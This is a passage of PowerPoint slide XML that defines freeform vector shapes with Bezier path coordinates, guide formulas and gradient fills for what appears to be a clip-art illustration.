                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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Freeform 1789"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2418" y="1435"/>
                  <a:ext cx="267" cy="226"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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1790"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2363" y="1229"/>
                  <a:ext cx="343" cy="269"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119"/>
                      </a:cubicBez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1791"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2440" y="1214"/>
                  <a:ext cx="89" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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Oval 1792"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2429" y="1132"/>
                  <a:ext cx="119" cy="119"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFCC99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66" name="Group 1250"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6166604" y="3156331"/>
              <a:ext cx="681037" cy="520700"/>
              <a:chOff x="2724" y="1560"/>
              <a:chExt cx="429" cy="328"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="967" name="Group 1249"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2953" y="1560"/>
                <a:ext cx="155" cy="263"/>
                <a:chOff x="2953" y="1560"/>
                <a:chExt cx="155" cy="263"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="990" name="Freeform 1155"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2953" y="1603"/>
                  <a:ext cx="155" cy="121"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 237"/>
                    <a:gd name="T1" fmla="*/ 113 h 186"/>
                    <a:gd name="T2" fmla="*/ 235 w 237"/>
                    <a:gd name="T3" fmla="*/ 113 h 186"/>
                    <a:gd name="T4" fmla="*/ 225 w 237"/>
                    <a:gd name="T5" fmla="*/ 49 h 186"/>
                    <a:gd name="T6" fmla="*/ 199 w 237"/>
                    <a:gd name="T7" fmla="*/ 24 h 186"/>
                    <a:gd name="T8" fmla="*/ 156 w 237"/>
                    <a:gd name="T9" fmla="*/ 12 h 186"/>
                    <a:gd name="T10" fmla="*/ 116 w 237"/>
                    <a:gd name="T11" fmla="*/ 2 h 186"/>
                    <a:gd name="T12" fmla="*/ 87 w 237"/>
                    <a:gd name="T13" fmla="*/ 12 h 186"/>
                    <a:gd name="T14" fmla="*/ 73 w 237"/>
                    <a:gd name="T15" fmla="*/ 85 h 186"/>
                    <a:gd name="T16" fmla="*/ 73 w 237"/>
                    <a:gd name="T17" fmla="*/ 85 h 186"/>
                    <a:gd name="T18" fmla="*/ 72 w 237"/>
                    <a:gd name="T19" fmla="*/ 90 h 186"/>
                    <a:gd name="T20" fmla="*/ 21 w 237"/>
                    <a:gd name="T21" fmla="*/ 104 h 186"/>
                    <a:gd name="T22" fmla="*/ 26 w 237"/>
                    <a:gd name="T23" fmla="*/ 135 h 186"/>
                    <a:gd name="T24" fmla="*/ 80 w 237"/>
                    <a:gd name="T25" fmla="*/ 122 h 186"/>
                    <a:gd name="T26" fmla="*/ 80 w 237"/>
                    <a:gd name="T27" fmla="*/ 122 h 186"/>
                    <a:gd name="T28" fmla="*/ 86 w 237"/>
                    <a:gd name="T29" fmla="*/ 120 h 186"/>
                    <a:gd name="T30" fmla="*/ 99 w 237"/>
                    <a:gd name="T31" fmla="*/ 112 h 186"/>
                    <a:gd name="T32" fmla="*/ 104 w 237"/>
                    <a:gd name="T33" fmla="*/ 92 h 186"/>
                    <a:gd name="T34" fmla="*/ 104 w 237"/>
                    <a:gd name="T35" fmla="*/ 92 h 186"/>
                    <a:gd name="T36" fmla="*/ 110 w 237"/>
                    <a:gd name="T37" fmla="*/ 47 h 186"/>
                    <a:gd name="T38" fmla="*/ 109 w 237"/>
                    <a:gd name="T39" fmla="*/ 160 h 186"/>
                    <a:gd name="T40" fmla="*/ 119 w 237"/>
                    <a:gd name="T41" fmla="*/ 170 h 186"/>
                    <a:gd name="T42" fmla="*/ 169 w 237"/>
                    <a:gd name="T43" fmla="*/ 184 h 186"/>
                    <a:gd name="T44" fmla="*/ 196 w 237"/>
                    <a:gd name="T45" fmla="*/ 165 h 186"/>
                    <a:gd name="T46" fmla="*/ 196 w 237"/>
                    <a:gd name="T47" fmla="*/ 160 h 186"/>
                    <a:gd name="T48" fmla="*/ 216 w 237"/>
                    <a:gd name="T49" fmla="*/ 155 h 186"/>
                    <a:gd name="T50" fmla="*/ 219 w 237"/>
                    <a:gd name="T51" fmla="*/ 154 h 186"/>
                    <a:gd name="T52" fmla="*/ 232 w 237"/>
                    <a:gd name="T53" fmla="*/ 146 h 186"/>
                    <a:gd name="T54" fmla="*/ 237 w 237"/>
                    <a:gd name="T55" fmla="*/ 124 h 186"/>
                    <a:gd name="T56" fmla="*/ 235 w 237"/>
                    <a:gd name="T57" fmla="*/ 113 h 186"/>
                    <a:gd name="T58" fmla="*/ 193 w 237"/>
                    <a:gd name="T59" fmla="*/ 75 h 186"/>
                    <a:gd name="T60" fmla="*/ 194 w 237"/>
                    <a:gd name="T61" fmla="*/ 87 h 186"/>
                    <a:gd name="T62" fmla="*/ 200 w 237"/>
                    <a:gd name="T63" fmla="*/ 123 h 186"/>
                    <a:gd name="T64" fmla="*/ 196 w 237"/>
                    <a:gd name="T65" fmla="*/ 124 h 186"/>
                    <a:gd name="T66" fmla="*/ 194 w 237"/>
                    <a:gd name="T67" fmla="*/ 87 h 186"/>
                    <a:gd name="T68" fmla="*/ 193 w 237"/>
                    <a:gd name="T69" fmla="*/ 75 h 186"/>
                    <a:gd name="T70" fmla="*/ 192 w 237"/>
                    <a:gd name="T71" fmla="*/ 70 h 186"/>
                    <a:gd name="T72" fmla="*/ 193 w 237"/>
                    <a:gd name="T73" fmla="*/ 75 h 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7" h="186">
                      <a:moveTo>
                        <a:pt x="235" y="113"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                        <a:pt x="235" y="113"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="84"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="223" y="32"/>
                        <a:pt x="207" y="26"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="90" y="4"/>
                        <a:pt x="87" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="86" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                        <a:pt x="73" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                        <a:pt x="72" y="90"/>
                      </a:cubicBezTo>
